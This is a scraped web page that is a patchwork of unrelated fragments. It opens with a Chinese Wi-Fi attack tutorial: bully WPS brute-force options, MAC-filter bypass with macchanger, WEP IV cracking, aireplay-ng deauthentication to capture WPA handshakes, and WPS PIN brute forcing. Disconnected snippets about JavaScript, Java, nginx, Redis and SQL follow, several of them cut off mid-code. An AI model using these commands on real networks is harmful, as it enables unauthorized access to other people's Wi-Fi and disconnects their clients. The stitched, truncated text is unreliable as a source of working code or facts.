	Treat M5 and M7 timeouts as NACK's, for those access points that don't send them but instead
	drop the transaction. When using this option you will probably want to increase the --timeout 
	value, so that bully doesn't incorrectly assume a pin is incorrect due to a delayed message.

  -N, --nofcs

	Some wireless hardware will have done the work of checking and stripping the FCS from packets
	already. Bully usually detects this and adjusts accordingly, but the option is here if you need
	to force it.

  -P, --probe

	Bully uses beacons to examine the WPS state of an access point. For nonbeaconing AP's, send
	directed probe requests and use the resulting probe responses instead. Requires --essid.

  -Q, --wpsinfo

	Gather WPS info by using probe request(s) against a target.
	May reveal chipset manufacturer, WPS version and other geeky stats.

  -R, --radiotap

	Assume radiotap headers are present in received packets. This is useful in cases where presence
	of radiotap headers is incorrectly reported or detected.

  -Z, --suppress

	Suppress automatic timimg algorithm and instead use default timings for received packets. NOT

  -W, --windows7

	Masquerade as a Windows 7 registrar.

  -V, --version

	Print version information to standard output and exit.

  -h, --help

	Display onscreen help.

  <p>管理员误以为MAC绑定是一种安全机制,能够限制可以关联的客户端MAC地址。<br> 准备AP:<br> 1、AP基本配置<br> 2、Open认证<br> 3、开启无线过滤<br> 修改MAC地址绕过过滤:<br> 别人做了白名单mac绑定,这样的话,侦听这个BSSID,查看哪一个STA的MAC已经连上,复制这个已经连上的STA的MAC,把这个MAC地址复制到自己的无线网卡的MAC上。</p> 
  <pre><code>ifconfig wlan0 down
macchanger -m 接MAC地址 接网卡
ifconfig wlan0 up
  <p>1、IV并非完全随机<br> 2、每224个包可能出现一次IV重用<br> 3、收集大量IV之后找出相同IV及其对应密文,分析得出共享密码<br> ARP回包中包含IV<br> 只要在IV足够多的情况下,任何复杂程度的WEP密码都可以被破解(IV量破解和暴力破解)</p> 
  <p>侦听正常的ARP包并重放给AP<br> AP回包中包含大量弱IV——>重复出现</p> 
  <p>强制客户端与AP断开关联<br> 重连生成ARP请求,AP回包包含IV<br> WPA重连过程,过程抓取4步握手过程,保存到本地cap文件中。<br> 无客户端情况下此攻击无效<br> 暴力破解条件:</p> 
	泄露密码(an Internet)
	kali中自带的字典 ——>有些密码不符合要求,会自动过滤
   <li>WPS是WiFi联盟2006年开发的一项技术<br> 通过PIN码来简化无线接入的操作,无需记住PSK<br> 路由器和网卡各按一个按钮就能接入无线<br> PIN码是分为前后各4位的2段共8位数字</li> 
   <li>安全漏洞<br> 2011年被发现安全涉及漏洞<br> 接入发起方可以根据路由器的返回信息判断前4位是否正确<br> 而PIN码的后4位只有1000种定义的组合(最后一位是checksum)<br> 所以全部穷举破解只需要11000次尝试<br> PSK:218340105584896种可能<br> 标准本身没有设计锁定机制,目前多个厂商已实现锁定机制<br> //都要支持WPS功能,初衷是:物理连接,物理确认(通过按钮 )。<br> //AP要是支持WPS的话,只要尝试最多11000次找出PIN码,就会被破解。<br> ——>因为有限制,所以设置攻击方式、次数等</li> 
   <li>用计算器直接算出PIN<br> C83A35、00B00C——>很少见<br> //它直接找出PIN码,最多11000次;找出后计算出key,肯定能算出,不像WPA要字典。</li> 
  <p>隐藏SSID防止破解有用么?<br> 隐藏SSID就是把你wifi的AP隐藏起来,不让别人搜索到。请注意,这样的话,在连接wifi时就要手动输入AP名。<br> <img src="http://img.e-com-net.com/image/info8/bae62dbf302041429c6dbd2643e0704e.jpg" alt="在这里插入图片描述" width="650" height="18"><br> 只看到了 length 12,没有ap名。</p> 
  <pre><code>airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 wlan0mon
aireplay-ng -0 30 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
  <p>本文同步更新至个人博客:罗小黑零食铺<br> 如果个人博客打不开就是维护升级中~</p> 
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var arr=[1,4,234,43,52,]; 
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   for(var y=x-1;y<arr.length;y++){ 
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                                    <div>安装rz sz程序时,报下面错误: 
[root@slave2 src]# make posix 
cc   -O -DPOSIX -DMD=2 rz.c -o rz 
make: cc:命令未找到 
make: *** [posix] 错误 127 
系统:centos 6.6 
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最近写服务,服务上线后,需要写一个定时执行的SQL脚本,清理并更新数据库表里的数据,应用到了Oracle 的 Job的相关知识。在此总结一下。 
 dba_jobs_running 包含正在运行</div>
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1、address pool is full: 
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Step 4: Run ADB command from your PC 
On the PC, you need install Amazon Fire ADB driver and instal</div>
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                                    <div>// 刚刚在书上看到的一个小问题,很有意思.大家一起思考下吧
myname = 'global';
var fn = function () {
	console.log(myname); // undefined
	var myname = 'local';
	console.log(myname); // local

// 上述代码实际上等同于以下代码
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TImerTask();Timer的子类  由 Timer 安排为一次执行或重复执行的任务。 
  定时器类Timer在java.util包中。使用时,先实例化,然后使用实例的schedule(TimerTask task, long delay)方法,设定</div>
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                                    <div>JDK1.5 Queue 
LinkedList不是同步的。如果多个线程同时访问列表,而其中至少一个线程从结构上修改了该列表,则它必须 保持外部同步。(结构修改指添加或删除一个或多个元素的任何操作;仅设置元素的值不是结构修改。)这一般通过对自然封装该列表的对象进行同步操作来完成。如果不存在这样的对象,则应该使用 Collections.synchronizedList 方</div>
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        在URL前加https://前缀表明是用SSL加密的。 你的电脑与服务器之间收发的信息传输将更加安全。 
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package com.tom.lang.generics;

public abstract class SuperGenerics<T1, T2> {
    private T1 t1;
    private T2 t2;

    public abstract void doIt(T</div>
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                                    <div>1. worker_processes    8; 
表示Nginx将启动8个工作者进程,通过ps -ef|grep nginx,会发现有8个Nginx Worker Process在运行 
nobody    53879 118449  0 Apr22 ?        00:26:15 nginx: worker process          </div>
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 local headers = ngx.req.get_headers()   
 ngx.say("headers begin", "<br/>")   
 ngx.say("Host : ", he</div>
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import java.util.Arrays;

public class MinSumASumB {

	 * Q32.有两个序列a,b,大小都为n,序列元素的值任意整数,无序.
	 * 要求:通过交换a,b中的元素,使[序列a元素的和]与[序列b元素的和]之间的差最小。 
	 * 例如: 
	 * int[] a = {100,99,98,1,2,3</div>
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                                    <div>在redis的redis.conf配置文件中找到# requirepass foobared 
把它替换成requirepass 12356789 后边的12356789就是你的密码 
打开redis客户端输入config get requirepass 
redis> config get requirepass 
1) "require</div>
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按键盘三个键:CTRL + ALT  +  F1 
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                                    <div>在单位的一台机器完全装了Ubuntu Server,但回家只能在XP上VM一个,装的时候网卡是DHCP的,用ifconfig查了一下ip是192.168.92.128,可以ping通。 
/etc/network/interfaces打开后里面可设置DHCP或手动设置静态ip。前面auto eth0,让网卡开机自动挂载. 
1. 以D</div>
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Composer 中国镜像      </div>
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                                    <div>本文译者:candeladiao,原文:URL filtering for UIWebView on the iPhone说明:译者在做app开发时,因为页面的javascript文件比较大导致加载速度很慢,所以想把javascript文件打包在app里,当UIWebView需要加载该脚本时就从app本地读取,但UIWebView并不支持加载本地资源。最后从下文中找到了解决方法,第一次翻译,难免有</div>
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DECLARE @tablename VARCHAR (128)
DECLARE @execstr VARCHAR (255)
DECLARE @objectid INT
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